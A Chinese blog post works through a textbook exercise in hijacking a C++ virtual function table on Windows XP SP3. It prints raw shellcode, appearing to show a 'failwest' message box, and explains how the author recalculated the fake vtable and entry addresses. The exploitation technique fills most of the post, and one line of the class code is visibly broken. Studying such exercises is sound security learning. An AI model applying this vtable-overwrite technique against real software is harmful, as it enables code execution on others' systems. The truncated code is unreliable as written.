废话不说,直接上代码 原版代码:
#include "windows.h" #include "iostream.h" char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x1C\x88\x40\x00";
//set fake virtual function pointer
class Failwest
{
public: char buf[200];
virtual void test(void)
{
cout<<"Class Vtable::test()"<test();
}
Failwest overflow, *p;
void main(void)
{
char * p_vtable;
p_vtable=overflow.buf-4;//point to virtual table
//__asm int 3
//reset fake virtual table to 0x004088cc
//the address may need to ajusted via runtime debug
p_vtable[0]=0xCC;
p_vtable[1]=0x88;
p_vtable[2]=0x40;
p_vtable[3]=0x00;
strcpy(overflow.buf,shellcode);//set fake virtual function pointer
p=&overflow;
p->test();
}
这是failwest书里原版代码。其附带的exe,经实测,可以在xp,sp3下运行。
但是很奇怪的是,我把源代码一字不改的重新在上述环境里编译后,却不能正常运行,不知道为什么。
于是,想到要改写程序,以适应实际的环境。
用paintf("%x\n",overflow.buf);得到overflow.buf为0x40BAAC
于是将源代码改写为
p_vtable[0]=0xAC - 4;
p_vtable[1]=0xBA;
p_vtable[2]=0x40;
p_vtable[3]=0x00;
程序正常运行。
原因:将虚表指针p_vtable改写为0x40BAA8,则程序执行到p->test()时,将按照伪造的虚函数指针去0x40BAA8寻找虚表,而0x40BAA8地址值也为0x40BAA8,即为无效指令,对程序执行无影响。但是EIP+4,跳到了shellcode的起始地址处,开始执行了shellcode,于是程序正常运行。(见下图)
法二:
分析原代码可知:
p_vtable[0]=0xCC;
p_vtable[1]=0x88;
p_vtable[2]=0x40;
p_vtable[3]=0x00;
执行后,
0x4088CC指向shellcode的末尾,在这里填上shellcode的起始位置0x0040881c作为伪造的虚函数入口地址,程序将最终去执行shellcode。
那么0x4088CC是怎么来的呢?
也就是shellcode首地址0x40881C + 176(0B0h) = 0x4088CC ,176为不加最后四字节"\x1C\x88\x40\x00"的shellcode的长度。
既然这样,那就好办了。
得到在我的系统里overflow.buf为0x40BAAC,那么加上0B0h,得0x40BB5C,即
p_vtable[0]=0x5c;
p_vtable[1]=0xbb;
p_vtable[2]=0x40;
p_vtable[3]=0x00;
然后将shellcode最后的入口地址改为
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\xac\xba\x40\x00";//set fake virtual function pointer
即可。
虽然原理比较简单,但这次是我第一次正儿八经的写次博客,这么少的字,但是中途还是有让我不想写的念头。但觉得既然决定了,就好好的写下去,毕竟写技术博客只有好处,没有坏处。
以后会继续写下去,争取写得更通俗易懂。